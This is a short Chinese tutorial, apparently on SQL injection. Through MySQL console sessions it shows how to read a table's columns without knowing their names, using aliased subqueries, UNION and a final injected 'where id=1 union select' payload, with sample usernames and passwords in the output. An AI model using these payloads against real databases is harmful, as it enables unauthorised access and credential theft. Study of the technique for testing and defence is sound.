Mysql如何繞過未知字段名詳解

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;  +---+---+---+---+  | a | b | c | d |  +---+---+---+---+  | 1 | 2 | 3 | 4 |  +---+---+---+---+  1 row in set (0.00 sec)     mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;  +---+---+---+---+  | 1 | 2 | 3 | 4 |  +---+---+---+---+  | 1 | 2 | 3 | 4 |  +---+---+---+---+  1 row in set (0.00 sec)     mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;  +---+-------+----------+-------------+  | 1 | 2  | 3  | 4   |  +---+-------+----------+-------------+  | 1 | 2  | 3  | 4   |  | 1 | admin | admin888 | 110@110.com |  | 2 | test | test123 | 119@119.com |  | 3 | cs | cs123 | 120@120.com |  +---+-------+----------+-------------+  4 rows in set (0.01 sec)     mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;  +-------------+  | 4   |  +-------------+  | 4   |  | 110@110.com |  | 119@119.com |  | 120@120.com |  +-------------+  4 rows in set (0.03 sec)     mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;     +-------------+  | 4   |  +-------------+  | 120@120.com |  +-------------+  1 row in set (0.01 sec)     mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d  union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;  +-------------+----------+----------+-------------+  | id   | username | password | email  |  +-------------+----------+----------+-------------+  | 1   | admin | admin888 | 110@110.com |  | 120@120.com | 1  | 1  | 1   |  +-------------+----------+----------+-------------+  2 rows in set (0.04 sec)